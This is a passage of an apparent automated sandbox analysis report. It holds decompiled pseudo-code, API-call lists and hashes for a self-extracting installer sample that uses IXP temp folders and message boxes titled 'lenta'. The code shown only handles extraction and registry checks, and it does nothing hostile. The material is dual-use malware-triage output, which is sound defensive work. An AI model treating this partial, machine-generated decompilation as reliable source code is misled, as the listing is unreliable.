									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0010681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E001067C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00106CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                                0x001044b9
                                                                                                                                                                                                                                                0x001044c4
                                                                                                                                                                                                                                                0x001044cb
                                                                                                                                                                                                                                                0x001044d8
                                                                                                                                                                                                                                                0x001044e4
                                                                                                                                                                                                                                                0x001044eb
                                                                                                                                                                                                                                                0x001044ee
                                                                                                                                                                                                                                                0x001044ef
                                                                                                                                                                                                                                                0x001044ef
                                                                                                                                                                                                                                                0x001044f1
                                                                                                                                                                                                                                                0x001044f7
                                                                                                                                                                                                                                                0x001044f8
                                                                                                                                                                                                                                                0x0010467b
                                                                                                                                                                                                                                                0x001044fe
                                                                                                                                                                                                                                                0x00104509
                                                                                                                                                                                                                                                0x00104518
                                                                                                                                                                                                                                                0x00104525
                                                                                                                                                                                                                                                0x00104562
                                                                                                                                                                                                                                                0x00104568
                                                                                                                                                                                                                                                0x00104568
                                                                                                                                                                                                                                                0x0010456b
                                                                                                                                                                                                                                                0x0010456b
                                                                                                                                                                                                                                                0x0010456d
                                                                                                                                                                                                                                                0x0010456e
                                                                                                                                                                                                                                                0x00104572
                                                                                                                                                                                                                                                0x00104578
                                                                                                                                                                                                                                                0x0010457c
                                                                                                                                                                                                                                                0x001045cb
                                                                                                                                                                                                                                                0x00104607
                                                                                                                                                                                                                                                0x00104607
                                                                                                                                                                                                                                                0x0010460d
                                                                                                                                                                                                                                                0x00104613
                                                                                                                                                                                                                                                0x00104617
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010461d
                                                                                                                                                                                                                                                0x00104623
                                                                                                                                                                                                                                                0x00104626
                                                                                                                                                                                                                                                0x00104628
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104628
                                                                                                                                                                                                                                                0x001045cd
                                                                                                                                                                                                                                                0x001045cd
                                                                                                                                                                                                                                                0x001045cf
                                                                                                                                                                                                                                                0x001045cf
                                                                                                                                                                                                                                                0x001045d2
                                                                                                                                                                                                                                                0x001045d2
                                                                                                                                                                                                                                                0x001045d4
                                                                                                                                                                                                                                                0x001045d5
                                                                                                                                                                                                                                                0x001045db
                                                                                                                                                                                                                                                0x001045de
                                                                                                                                                                                                                                                0x001045e3
                                                                                                                                                                                                                                                0x001045e9
                                                                                                                                                                                                                                                0x001045ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001045f3
                                                                                                                                                                                                                                                0x001045fd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104602
                                                                                                                                                                                                                                                0x001045ed
                                                                                                                                                                                                                                                0x0010457e
                                                                                                                                                                                                                                                0x0010457e
                                                                                                                                                                                                                                                0x00104580
                                                                                                                                                                                                                                                0x00104580
                                                                                                                                                                                                                                                0x00104583
                                                                                                                                                                                                                                                0x00104583
                                                                                                                                                                                                                                                0x00104585
                                                                                                                                                                                                                                                0x00104586
                                                                                                                                                                                                                                                0x0010458a
                                                                                                                                                                                                                                                0x0010458c
                                                                                                                                                                                                                                                0x0010458f
                                                                                                                                                                                                                                                0x0010458f
                                                                                                                                                                                                                                                0x00104591
                                                                                                                                                                                                                                                0x00104592
                                                                                                                                                                                                                                                0x0010459b
                                                                                                                                                                                                                                                0x0010459e
                                                                                                                                                                                                                                                0x001045a3
                                                                                                                                                                                                                                                0x001045a9
                                                                                                                                                                                                                                                0x001045ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001045af
                                                                                                                                                                                                                                                0x001045af
                                                                                                                                                                                                                                                0x001045bf
                                                                                                                                                                                                                                                0x0010462d
                                                                                                                                                                                                                                                0x00104630
                                                                                                                                                                                                                                                0x0010463d
                                                                                                                                                                                                                                                0x0010464e
                                                                                                                                                                                                                                                0x0010464e
                                                                                                                                                                                                                                                0x0010463f
                                                                                                                                                                                                                                                0x00104640
                                                                                                                                                                                                                                                0x00104647
                                                                                                                                                                                                                                                0x0010464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010464c
                                                                                                                                                                                                                                                0x00104666
                                                                                                                                                                                                                                                0x0010466d
                                                                                                                                                                                                                                                0x0010466f
                                                                                                                                                                                                                                                0x00104675
                                                                                                                                                                                                                                                0x00104675
                                                                                                                                                                                                                                                0x001045ad
                                                                                                                                                                                                                                                0x00104527
                                                                                                                                                                                                                                                0x0010452e
                                                                                                                                                                                                                                                0x0010453f
                                                                                                                                                                                                                                                0x0010453f
                                                                                                                                                                                                                                                0x00104530
                                                                                                                                                                                                                                                0x00104531
                                                                                                                                                                                                                                                0x00104538
                                                                                                                                                                                                                                                0x0010453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010453d
                                                                                                                                                                                                                                                0x00104554
                                                                                                                                                                                                                                                0x0010455a
                                                                                                                                                                                                                                                0x0010455a
                                                                                                                                                                                                                                                0x0010455a
                                                                                                                                                                                                                                                0x00104525
                                                                                                                                                                                                                                                0x0010468c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 001045A3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 001045E3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 0010460D
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00104630
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00104666
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0010466F
                                                                                                                                                                                                                                                  • Part of subcall function 0010681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0010686E
                                                                                                                                                                                                                                                  • Part of subcall function 0010681F: GetSystemMetrics.USER32(0000004A), ref: 001068A7
                                                                                                                                                                                                                                                  • Part of subcall function 0010681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001068CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010681F: RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,?,0000000C), ref: 001068F4
                                                                                                                                                                                                                                                  • Part of subcall function 0010681F: RegCloseKey.ADVAPI32(?), ref: 00106902
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                                • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                                • Opcode ID: 6102901cdb40517ffa2dab09e6d35c89865dbcfedee034541430b0c2548c7f8d
                                                                                                                                                                                                                                                • Instruction ID: c7dcf02e3b778461f22d21a4b0b89bee97f62f4eae7aabbac52098726158ab5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6102901cdb40517ffa2dab09e6d35c89865dbcfedee034541430b0c2548c7f8d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E351D6B1900219ABDB219F28DC88BAA7B69EF45310F144195FEC9A7281DBF2DD45CB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001053A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E001053A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0010171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00101680(_t32, 0x104, _t20);
					E0010658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00106CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x108a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                                0x001053ac
                                                                                                                                                                                                                                                0x001053b3
                                                                                                                                                                                                                                                0x001053b9
                                                                                                                                                                                                                                                0x001053bb
                                                                                                                                                                                                                                                0x001053bd
                                                                                                                                                                                                                                                0x001053bf
                                                                                                                                                                                                                                                0x001053d1
                                                                                                                                                                                                                                                0x001053d6
                                                                                                                                                                                                                                                0x001053e0
                                                                                                                                                                                                                                                0x001053e2
                                                                                                                                                                                                                                                0x001053f5
                                                                                                                                                                                                                                                0x001053fb
                                                                                                                                                                                                                                                0x00105402
                                                                                                                                                                                                                                                0x0010540b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105413
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105415
                                                                                                                                                                                                                                                0x00105416
                                                                                                                                                                                                                                                0x00105427
                                                                                                                                                                                                                                                0x0010542a
                                                                                                                                                                                                                                                0x0010542b
                                                                                                                                                                                                                                                0x00105434
                                                                                                                                                                                                                                                0x00105434
                                                                                                                                                                                                                                                0x0010543a
                                                                                                                                                                                                                                                0x0010544c
                                                                                                                                                                                                                                                0x0010544c
                                                                                                                                                                                                                                                0x00105452
                                                                                                                                                                                                                                                0x0010545a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010545e
                                                                                                                                                                                                                                                0x0010545f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010171E: _vsnprintf.MSVCRT ref: 00101750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001053FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010541F
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-3361814588
                                                                                                                                                                                                                                                • Opcode ID: 3e3907497b7dd77ab8b4f32eaef8deeb72ad49b2c7c7879ff227d3e7bf53fd80
                                                                                                                                                                                                                                                • Instruction ID: c93672f7e75f66ed117c67face569c398cd2fb1b9a500fef267a6d53a42f20cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e3907497b7dd77ab8b4f32eaef8deeb72ad49b2c7c7879ff227d3e7bf53fd80
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A011017170060877E3209B269C49FEF3A6EEFD1321F400125B6C6D25D0DFF889868AA6
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00105467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 522 105467-105484 523 10548a-105490 call 1053a1 522->523 524 10551c-105528 call 101680 522->524 527 105495-105497 523->527 528 10552d-105539 call 1058c8 524->528 529 105581-105583 527->529 530 10549d-1054c0 call 101781 527->530 537 10553b-105545 CreateDirectoryA 528->537 538 10554d-105552 528->538 532 10558d-10559d call 106ce0 529->532 539 1054c2-1054d8 GetSystemInfo 530->539 540 10550c-10551a call 10658a 530->540 542 105577-10557c call 106285 537->542 543 105547 537->543 544 105554-105557 call 10597d 538->544 545 105585-10558b 538->545 548 1054da-1054dd 539->548 549 1054fe 539->549 540->528 542->529 543->538 555 10555c-10555e 544->555 545->532 553 1054f7-1054fc 548->553 554 1054df-1054e2 548->554 556 105503-105507 call 10658a 549->556 553->556 557 1054f0-1054f5 554->557 558 1054e4-1054e7 554->558 555->545 559 105560-105566 555->559 556->540 557->556 558->540 561 1054e9-1054ee 558->561 559->529 562 105568-105575 RemoveDirectoryA 559->562 561->556 562->529
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E00105467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x1091e4;
					_t42 = 0x104;
					E00101680(0x1091e4, 0x104);
					L14:
					_t13 = E001058C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x109124 = 0;
							_t14 = 1;
							L24:
							return E00106CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0010597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x108a20; // 0x0
						if(_t61 != 0) {
							 *0x108a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x109124 = E00106285();
						goto L22;
					}
					 *0x108a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E001053A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x1091e4;
				E00101781(0x1091e4, 0x104, __ecx,  &_v268);
				if(( *0x109a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0010658A(_t48, 0x104, 0x101140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0010658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                                0x00105472
                                                                                                                                                                                                                                                0x00105479
                                                                                                                                                                                                                                                0x00105481
                                                                                                                                                                                                                                                0x00105484
                                                                                                                                                                                                                                                0x0010551c
                                                                                                                                                                                                                                                0x00105521
                                                                                                                                                                                                                                                0x00105528
                                                                                                                                                                                                                                                0x0010552d
                                                                                                                                                                                                                                                0x0010552f
                                                                                                                                                                                                                                                0x00105539
                                                                                                                                                                                                                                                0x0010554d
                                                                                                                                                                                                                                                0x0010554d
                                                                                                                                                                                                                                                0x00105552
                                                                                                                                                                                                                                                0x00105585
                                                                                                                                                                                                                                                0x00105585
                                                                                                                                                                                                                                                0x0010558b
                                                                                                                                                                                                                                                0x0010558d
                                                                                                                                                                                                                                                0x0010559d
                                                                                                                                                                                                                                                0x0010559d
                                                                                                                                                                                                                                                0x00105557
                                                                                                                                                                                                                                                0x0010555e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105560
                                                                                                                                                                                                                                                0x00105566
                                                                                                                                                                                                                                                0x00105569
                                                                                                                                                                                                                                                0x0010556f
                                                                                                                                                                                                                                                0x0010556f
                                                                                                                                                                                                                                                0x00105581
                                                                                                                                                                                                                                                0x00105581
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105581
                                                                                                                                                                                                                                                0x00105545
                                                                                                                                                                                                                                                0x0010557c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010557c
                                                                                                                                                                                                                                                0x00105547
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105547
                                                                                                                                                                                                                                                0x0010548a
                                                                                                                                                                                                                                                0x00105490
                                                                                                                                                                                                                                                0x00105497
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010549d
                                                                                                                                                                                                                                                0x001054ab
                                                                                                                                                                                                                                                0x001054b4
                                                                                                                                                                                                                                                0x001054c0
                                                                                                                                                                                                                                                0x0010550c
                                                                                                                                                                                                                                                0x00105511
                                                                                                                                                                                                                                                0x00105515
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105515
                                                                                                                                                                                                                                                0x001054c9
                                                                                                                                                                                                                                                0x001054d6
                                                                                                                                                                                                                                                0x001054d8
                                                                                                                                                                                                                                                0x001054fe
                                                                                                                                                                                                                                                0x00105503
                                                                                                                                                                                                                                                0x00105507
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105507
                                                                                                                                                                                                                                                0x001054da
                                                                                                                                                                                                                                                0x001054dd
                                                                                                                                                                                                                                                0x001054f7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001054f7
                                                                                                                                                                                                                                                0x001054df
                                                                                                                                                                                                                                                0x001054e2
                                                                                                                                                                                                                                                0x001054f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001054f0
                                                                                                                                                                                                                                                0x001054e7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001054e9
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001054C9
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010553D
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010556F
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001053FB
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105402
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010541F
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010542B
                                                                                                                                                                                                                                                  • Part of subcall function 001053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105434
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                • API String ID: 1979080616-510557316
                                                                                                                                                                                                                                                • Opcode ID: 5dcd533812b587356c8927190d60a1705486754b5a770db91f5f5be5200d44ee
                                                                                                                                                                                                                                                • Instruction ID: 70fc55f886ec6dd77d7ead368968f846228a759639b0042986a842f7167e42b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dcd533812b587356c8927190d60a1705486754b5a770db91f5f5be5200d44ee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B331F571B00A14ABCB149F299C4497F77ABAB95350B04412AB8C2E79D1DFF4CE82CE95
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 563 10256d-10257d 564 102622-102627 call 1024e0 563->564 565 102583-102589 563->565 573 102629-10262f 564->573 567 1025e8-102607 RegOpenKeyExA 565->567 568 10258b 565->568 569 1025e3-1025e6 567->569 570 102609-102620 RegQueryInfoKeyA 567->570 572 102591-102595 568->572 568->573 569->573 574 1025d1-1025dd RegCloseKey 570->574 572->573 575 10259b-1025ba RegOpenKeyExA 572->575 574->569 575->569 576 1025bc-1025cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E0010256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E001024E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                                0x00102572
                                                                                                                                                                                                                                                0x00102573
                                                                                                                                                                                                                                                0x00102575
                                                                                                                                                                                                                                                0x00102578
                                                                                                                                                                                                                                                0x0010257d
                                                                                                                                                                                                                                                0x00102627
                                                                                                                                                                                                                                                0x00102583
                                                                                                                                                                                                                                                0x00102586
                                                                                                                                                                                                                                                0x00102589
                                                                                                                                                                                                                                                0x001025eb
                                                                                                                                                                                                                                                0x00102607
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102609
                                                                                                                                                                                                                                                0x0010261a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010261a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010258b
                                                                                                                                                                                                                                                0x0010258b
                                                                                                                                                                                                                                                0x0010259e
                                                                                                                                                                                                                                                0x001025b2
                                                                                                                                                                                                                                                0x001025ba
                                                                                                                                                                                                                                                0x001025cb
                                                                                                                                                                                                                                                0x001025d1
                                                                                                                                                                                                                                                0x001025d6
                                                                                                                                                                                                                                                0x001025da
                                                                                                                                                                                                                                                0x001025dd
                                                                                                                                                                                                                                                0x001025dd
                                                                                                                                                                                                                                                0x001025e3
                                                                                                                                                                                                                                                0x001025e3
                                                                                                                                                                                                                                                0x001025e3
                                                                                                                                                                                                                                                0x0010258b
                                                                                                                                                                                                                                                0x00102589
                                                                                                                                                                                                                                                0x0010262f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
